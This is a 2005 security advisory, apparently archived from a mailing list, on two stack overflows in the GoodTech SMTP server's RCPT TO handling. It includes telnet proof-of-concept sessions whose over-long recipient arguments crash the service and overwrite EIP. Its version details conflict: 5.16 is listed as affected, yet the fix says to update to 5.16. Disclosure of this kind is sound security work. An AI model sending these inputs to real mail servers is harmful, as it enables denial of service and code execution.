<<< Date Index >>>     <<< Thread Index >>>

GoodTech SMTP server 5.16 RCPT TO command remote buffer overflow



            Arbitrary code execution in GoodTech's SMTP server

                       discovered by Raphaël Rigo

Product: SMTP server by GoodTech Systems
Affected Version: 5.16 Evaluation (verified), <= regged and 5.15 probably too
Not affected Version: 5.17
OS affected: All WinNT (NT/2K/XP/2K3)
Risk: Critical
Remote Exploit: yes
URL: http://www.goodtechsys.com/smtpdnt2000.asp

Overview
========

The product provides Simple Mail Transfer Protocol (SMTP) to any email client
out of the box. It forwards email messages directly to their recipients.
GoodTech SMTP server runs as a service on the host Windows machine.


Vulnerabilities
===============

         1) Stack overflow in RCPT TO command handling

         Unchecked string copies allow a classic stack overflow.

         Details :
         A cascade of unchecked string copies is responsible for this
         vulnerability :
                - The maximum length of a command is 4096.
                - The requested email is copied without checking nor direct
                consequences into a 2048 bytes buffer.
                - The domain is extracted and copied without checking nor
                direct consequences into a 256 bytes buffer.
                - The following code is executed : sprintf(buf,"mx.%s",domain)
                buf is only 64 bytes long, and can thus be overflowed,
                overwriting a string containing the DNS server to be used to
                find the MX request.
                - This string being non-empty, the following code is executed:
                sprintf(buf1024, "Using DNS Server %s", dnsserver)
                but since we have ~4000 bytes for the domain, this can overflow
                and overwrite the return address of the function, allowing
                arbitrary code execution.

         Risk : Critical
         The attacker may execute arbitrary code with the privileges of the
         SYSTEM user (by default).

         Proof of concept :

         $ telnet localhost 25
         Connected to localhost.
         Escape character is '^]'.
         220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
         HELO aaa
         250 OK
         RCPT TO: <aa@|'A'x1100>
         Connection closed by foreign host.

         Service crashes with EIP==0x41414141

         Workaround :
         There is no possible workaround.

         Solution :
         Update to v5.16

         -----------------------------------------------------------------------

         2) Stack overflow in multiple RCPT TO commands handling

         Unchecked string copy allows a classic stack overflow.

         Details :
         For each RCPT TO command, the server fills a 1300 bytes structure
         containing the requested command and the MX server for the requested
         email.
         The server allows up to 99 RCPT TO for a single mail, but the filling
         of this structure is done via unchecked string copy : the command,
         up to 4096 bytes long, is copied without checking into the structure.
         This behaviour allows us to overwrite the return address of the thread
         by issuing a long command in the 99th RCPT TO command.
         We have then to issue a QUIT command to exit the thread and execute
         our code.

         Risk : Critical
         The attacker may execute arbitrary code with the privileges of the
         SYSTEM user (by default).

         Proof of concept :

         $ telnet localhost 25
         Connected to localhost.
         Escape character is '^]'.
         220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
         HELO aaa
         250 OK
         -- Repeat this part 98 times
         RCPT TO: <aa@aa>
         250 OK
         --
         RCPT TO: <|'A'x2600|@localhost>
         250 OK
         QUIT
         Connection closed by foreign host.

         Service crashes with EIP==0x41414141

         Workaround :
         There is no possible workaround.

         Solution :
         Update to v5.16

         -----------------------------------------------------------------------

Acknowledgments
===============

Thanks to the developer for quick response and fix.

Timeline
========
2005-07-19        Discovery
2005-07-21        First attempt to contact developer
2005-07-21        Developer reply
2005-07-22        Fixed version released
2005-07-23        Advisory published